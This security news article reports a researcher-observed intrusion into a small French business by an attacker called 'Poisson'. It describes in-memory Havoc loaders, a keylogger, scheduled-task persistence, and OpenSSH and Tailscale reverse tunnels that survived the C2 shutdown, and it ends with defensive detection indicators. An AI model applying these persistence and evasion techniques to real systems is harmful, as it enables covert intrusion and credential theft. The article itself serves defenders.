A recent cyber intrusion into a small French automotive business has highlighted a critical vulnerability in typical cybersecurity remediation strategies. French-speaking attacker known as “Poisson” employed a sophisticated tactic of establishing a secondary, covert access channel before his primary command-and-control (C2) server was taken offline. This ensured continued access to the victim’s network, even after the initial intrusion vector was seemingly neutralized. Researchers at Cato Networks captured the full operation, providing a rare, granular view of the attacker’s actions from their perspective.
The incident underscores a stark lesson for businesses: simply disabling a C2 server is insufficient if the attacker has proactively built a persistent backdoor. In this case, Poisson installed OpenSSH and Tailscale on the victim’s machine, creating an independent route that bypassed the now-dormant C2 infrastructure. This resilience meant that when the Havoc C2 server went dark, Poisson’s access remained intact, and he was able to reconnect 18 days later to continue his activities.
A Learning Attacker’s Persistent Access
The actor, operating under the handle “Poisson,” appears to be a less experienced operator, exhibiting what researchers described as a “school schedule” of activity, with consistent operation times. Despite thin tradecraft, evidenced by instances of leaking his own home directory and naming storage buckets after himself, Poisson managed to compromise four machines. His methods, while sometimes faltering, ultimately proved effective in establishing a persistent presence.
The malware’s execution was largely in-memory, utilizing a VBScript stager, a PowerShell loader, and a .NET loader designed to run Havoc’s Demon agent without writing the implant to disk. For privilege escalation, Poisson utilized a standard `Start-Process -Verb RunAs` command, which requires user interaction via the Windows User Account Control (UAC) prompt. This required multiple attempts on one victim, taking over a dozen tries across two days.
To ensure long-term access, Poisson established a scheduled task designed to run at every login with the highest privileges. He also injected shellcode into Explorer.exe and deployed a custom-built RustDesk as a fallback communication channel. His primary method of credential harvesting involved a straightforward 70-line Python keylogger. This tool saved keystrokes to a local file, which Poisson then manually retrieved. He also employed the `powercfg` command to prevent victim machines from entering sleep mode, thereby ensuring continuous data collection.
The Critical Persistence Layer
The defining move of this operation occurred on April 7. During a five-hour session, Poisson installed OpenSSH Server and Tailscale on the compromised machine. He then connected the victim’s system to his private Tailscale network, establishing SSH-based access and a reverse tunnel. This setup allowed him to access the machine through Tailscale’s encrypted mesh network without relying on the C2 server or exposing any services externally.
The following day, the Havoc C2 infrastructure went offline. According to Cato, the reason for this downtime is not specified, but its impact was mitigated by Poisson’s foresight. The Tailscale connection operated on an entirely separate network, ensuring that his access persisted. When the original C2 server eventually reappeared on April 26, the agents automatically reconnected, eliminating the need for a fresh compromise.
In the final five days of the observed activity, Poisson executed 145 additional commands. He probed smart-card and certificate stores, suggesting an interest in certificate-based authentication methods. Additionally, he ran two unexplained executables from a file named Thales.zip for approximately 32 minutes before deleting 17 files and ceasing activity on May 1. His objective appeared narrow, focusing on direct financial gain through credentials rather than wider lateral movement or ransomware deployment. He targeted banking logins, email passwords, and government portal credentials, which represent immediate financial exposure for a small business owner.
The tools employed by Poisson are not novel. Tailscale has been used by advanced persistent threats (APTs) like China’s APT31, and legitimate remote-access tools such as Ngrok and Fleetdeck have been leveraged by groups like Scattered Spider. RustDesk, Poisson’s backup channel, has also appeared in recent Akira ransomware intrusions. The use of signed, legitimate binaries makes detection difficult for security solutions that rely solely on identifying malicious files rather than analyzing suspicious behavior.
Cato Networks has outlined several key indicators for cybersecurity professionals to monitor:
- Alerts for OpenSSH Server installations on Windows workstations, as this is rarely a legitimate configuration for typical end-user machines.
- Monitoring for the presence of `tailscale.exe` on systems not expected to utilize VPNs.
- Detection of `ssh -R` reverse tunnels directed towards external hosts.
- Identification of `wscript.exe` executing .vbs files from user staging folders.
- Flagging scheduled tasks configured with the highest privileges that launch script interpreters.
- Watching for changes to standby timeout settings via `powercfg` that keep machines active.
- Blocking access to DuckDNS, which was used for dynamic DNS resolution.
The overarching lesson is to treat a disabled C2 server as only one part of a potential compromise. Organizations must actively search for secondary persistence mechanisms that attackers may have established. The true impact of such intrusions lies not just in the initial breach, but in the attacker’s ability to maintain access through hidden backdoors. If an attacker can maintain access through OpenSSH, Tailscale, scheduled tasks, or keyloggers even after the C2 is gone, the threat remains active. This is a critical gap in many current remediation strategies.
The exact nature of the executables within Thales.zip and their specific actions remain an open question. However, the more significant takeaway is the fundamental principle: the C2 server was merely one entry point. Disabling it while leaving other persistent access methods intact means the attacker still holds a key to the network. Understanding and eradicating these secondary persistence layers is paramount to achieving true remediation.